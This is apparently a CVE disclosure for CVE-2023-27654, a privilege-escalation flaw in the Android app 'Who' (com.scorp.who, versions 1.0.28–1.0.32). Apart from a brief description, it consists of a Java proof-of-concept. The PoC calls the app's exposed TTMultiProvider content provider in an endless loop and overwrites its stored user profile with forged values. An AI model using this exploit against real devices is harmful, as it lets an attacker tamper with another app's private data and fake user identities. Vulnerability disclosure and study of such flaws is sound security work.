Escalation of Privileges exists in WHO(CVE-2023-27654)
Vendor:WHO(https://www.whoapp.live/)
Affected product:Who(com.scorp.who)
Version:1.0.28, 1.0.30, 1.0.32
Download link:https://play.google.com/store/apps/details?id=com.scorp.who
Description of the vulnerability for use in the CVE:An issue found in WHOv.1.0.28, v.1.0.30, v.1.0.32 allows an attacker to cause an escalation of privileges via the TTMultiProvider component.
poc:
public void attack() {
ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
String randomString =getRandomString(512);
Uri uri = Uri.parse("content://com.scorp.who.TTMultiProvider/t_sp/contain/" + "zztest" + "?sp_file_name=unityads-installinfo");
while (true) {
ContentValues contentValues = new ContentValues();
contentValues.put("apiUserProfile", "{\"is_verified\":false,\"is_favorite\":false,\"uid\":\"FlG4hFCFrxPQMQ2UfejzeJuzoy92\",\"b\":2,\"c\":3,\"d\":0,\"lang\":\"jp\",\"bio\":\"hack\",\"workTitle\":\"hack\",\"workCompany\":\"hack\",\"education\":\"hack\",\"redactedName\":\"T*******\",\"name\":\"hack\",\"ppImageURL\":\"https://d2veheavfolhls.cloudfront.net/pp%2FFlG4hFCFrxPQMQ2UfejzeJuzoy92%2Fd8350738-45da-4221-a648-5082259139c5?alt\\u003dmedia\",\"ppImageID\":\"d8350738-45da-4221-a648-5082259139c5\",\"country\":{\"code\":\"HK\",\"name\":\"Hong Kong SAR China\",\"flag\":\"https://d2veheavfolhls.cloudfront.net/misc%2Fflags%2FHK@3x.png?alt\\u003dmedia\"},\"birthday\":\"1999-11-29T06:22:00.000Z\",\"age\":99,\"popularity\":1000,\"like_count\":-1,\"shared_id\":\"123456789\",\"favorite_count\":0,\"self_favorite_count\":3,\"ppImages\":[{\"ID\":\"d8350738-45da-4221-a648-5082259139c5\",\"URL\":\"https://d2veheavfolhls.cloudfront.net/pp%2FFlG4hFCFrxPQMQ2UfejzeJuzoy92%2Fd8350738-45da-4221-a648-5082259139c5?alt\\u003dmedia\",\"review_status\":0}],\"profileVideos\":[{\"ID\":\"d4f68235-630c-46b2-b45a-b9716b4ee6da\",\"URL\":\"https://d2veheavfolhls.cloudfront.net/pv%2FFlG4hFCFrxPQMQ2UfejzeJuzoy92%2Fd4f68235-630c-46b2-b45a-b9716b4ee6da?alt\\u003dmedia\",\"thumbnailURL\":\"https://d2veheavfolhls.cloudfront.net/pvt%2FFlG4hFCFrxPQMQ2UfejzeJuzoy92%2Fd4f68235-630c-46b2-b45a-b9716b4ee6da?alt\\u003dmedia\",\"review_status\":0}]}");
contentResolver.update(uri,contentValues,null,null);
}
}